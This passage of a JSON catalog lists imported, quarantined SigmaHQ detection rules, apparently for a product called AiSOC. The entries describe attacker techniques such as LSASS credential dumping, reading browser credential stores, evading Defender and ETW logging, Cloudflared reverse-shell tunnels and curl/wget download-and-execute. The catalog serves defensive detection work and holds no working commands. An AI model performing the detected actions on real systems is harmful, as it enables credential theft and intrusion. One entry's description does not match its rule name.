LSASS (Local Security Authority Subsystem Service).\nThis could be the cause of a provoked crash by techniques such as Lsass-Shtinkering to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-crashed-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/application_error/win_application_error_lsass_crash.yml" } }, { "id": "sigmahq-sigma-a197e378-d31b-41c0-9635-cfdf1c1bb423", "type": "detection", "name": "HackTool - WinRM Access Via Evil-WinRM", "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winrm-access-via-evil-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml" } }, { "id": "sigmahq-sigma-a1a144b7-5c9b-4853-a559-2172be8d4a03", "type": "detection", "name": "Remote Thread Creation In Uncommon Target Image", "description": "Detects uncommon target processes for remote thread creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-in-uncommon-target-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml" } }, { "id": "sigmahq-sigma-a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "type": "detection", "name": "Potential Remote Command Execution In Pod Container", "description": "Detects attempts to execute remote commands, within a Pod's container using e.g. the \"kubectl exec\" command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-command-execution-in-pod-container.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml" } }, { "id": "sigmahq-sigma-a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "type": "detection", "name": "Potential Persistence Via DLLPathOverride", "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-dllpathoverride.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" } }, { "id": "sigmahq-sigma-a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6", "type": "detection", "name": "Disabling Windows Defender WMI Autologger Session via Reg.exe", "description": "Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.\nBy setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events\nfrom being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-windows-defender-wmi-autologger-session-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_disable_defender_wmi_autologger.yml" } }, { "id": "sigmahq-sigma-a1d9eec5-33b2-4177-8d24-27fe754d0812", "type": "detection", "name": "Cloudflared Tunnels Related DNS Requests", "description": "Detects DNS requests to Cloudflared tunnels domains.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnels-related-dns-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1d9eec5-33b2-4177-8d24-27fe754d0812", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_cloudflared_communication.yml" } }, { "id": "sigmahq-sigma-a1dfd976-4852-41d4-9507-dc6590a3ccd0", "type": "detection", "name": "Suspicious File Access to Browser Credential Storage", "description": "Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\nAdversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\nThis behavior is often commonly observed in credential stealing malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1555.003", "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-access-to-browser-credential-storage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1dfd976-4852-41d4-9507-dc6590a3ccd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_process_access_browser_cred_files.yml" } }, { "id": "sigmahq-sigma-a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "type": "detection", "name": "Potential Persistence Via Event Viewer Events.asp", "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-event-viewer-events-asp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" } }, { "id": "sigmahq-sigma-a20391f8-76fb-437b-abc0-dba2df1952c6", "type": "detection", "name": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-nodejstools-pressanykey-arbitrary-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-a20def93-0709-4eae-9bd2-31206e21e6b2", "type": "detection", "name": "DriverQuery.EXE Execution", "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driverquery-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" } }, { "id": "sigmahq-sigma-a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "type": "detection", "name": "DNS Server Discovery Via LDAP Query", "description": "Detects DNS server discovery via LDAP query requests from uncommon applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-server-discovery-via-ldap-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml" } }, { "id": "sigmahq-sigma-a23791fe-8846-485a-b16b-ca691e1b03d4", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" } }, { "id": "sigmahq-sigma-a238b5d0-ce2d-4414-a676-7a531b3d13d6", "type": "detection", "name": "ETW Trace Evasion Activity", "description": "Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-trace-evasion-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" } }, { "id": "sigmahq-sigma-a24e5861-c6ca-4fde-a93c-ba9256feddf0", "type": "detection", "name": "Uncommon Process Access Rights For Target Image", "description": "Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1055.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-process-access-rights-for-target-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a24e5861-c6ca-4fde-a93c-ba9256feddf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml" } }, { "id": "sigmahq-sigma-a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", "type": "detection", "name": "CSExec Service Installation", "description": "Detects CSExec service installation and execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml" } }, { "id": "sigmahq-sigma-a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "type": "detection", "name": "RDP Sensitive Settings Changed to Zero", "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-sensitive-settings-changed-to-zero.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" } }, { "id": "sigmahq-sigma-a2910908-e86f-4687-aeba-76a5f996e652", "type": "detection", "name": "DLL Execution Via Register-cimprovider.exe", "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-execution-via-register-cimprovider-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2910908-e86f-4687-aeba-76a5f996e652", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml" } }, { "id": "sigmahq-sigma-a29808fd-ef50-49ff-9c7a-59a9b040b404", "type": "detection", "name": "HackTool - Pypykatz Credentials Dumping Activity", "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-pypykatz-credentials-dumping-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml" } }, { "id": "sigmahq-sigma-a29c1813-ab1f-4dde-b489-330b952e91ae", "type": "detection", "name": "Suspicious Network Command", "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_network_command.yml" } }, { "id": "sigmahq-sigma-a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "type": "detection", "name": "Azure AD Threat Intelligence", "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-threat-intelligence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" } }, { "id": "sigmahq-sigma-a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa", "type": "detection", "name": "Suspicious Download and Execute Pattern via Curl/Wget", "description": "Detects suspicious use of command-line tools such as curl or wget to download remote\ncontent - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by\nimmediate execution, indicating potential malicious activity. This pattern is commonly used\nby malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-and-execute-pattern-via-curl-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml" } }, { "id": "sigmahq-sigma-a2e5019d-a658-4c6a-92bf-7197b54e2cae", "type": "detection", "name": "PowerShell Scripts Installed as Services", "description": "Detects powershell script installed as a Service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-scripts-installed-as-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml" } }, { "id": "sigmahq-sigma-a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "type": "detection", "name": "Suspicious Driver Install by pnputil.exe", "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-driver-install-by-pnputil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" } }, { "id": "sigmahq-sigma-a2edbce1-95c8-4291-8676-0d45146862b3", "type": "detection", "name": "Potential SolidPDFCreator.DLL Sideloading", "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-solidpdfcreator-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2edbce1-95c8-4291-8676-0d45146862b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_solidpdfcreator.yml" } }, { "id": "sigmahq-sigma-a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "type": "detection", "name": "Raccine Uninstall", "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/raccine-uninstall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" } }, { "id": "sigmahq-sigma-a34f79a3-8e5f-4cc3-b765-de00695452c2", "type": "detection", "name": "HackTool - PowerTool Execution", "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-powertool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" } }, { "id": "sigmahq-sigma-a3501e8e-af9e-43c6-8cd6-9360bdaae498", "type": "detection", "name": "Activity from Suspicious IP Addresses", "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-suspicious-ip-addresses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml" } }, { "id": "sigmahq-sigma-a35f5a72-f347-4e36-8895-9869b0d5fc6d", "type": "detection", "name": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-program-location-whitelisted-in-firewall-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" } }, { "id": "sigmahq-sigma-a383dec4-deec-4e6e-913b-ed9249670848", "type": "detection", "name": "Potential Signing Bypass Via Windows Developer Features", "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-signing-bypass-via-windows-developer-features.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a383dec4-deec-4e6e-913b-ed9249670848", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" } }, { "id": "sigmahq-sigma-a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "type": "detection", "name": "Program Executions in Suspicious Folders", "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "version": "1.0.0", "author": "AiSOC", 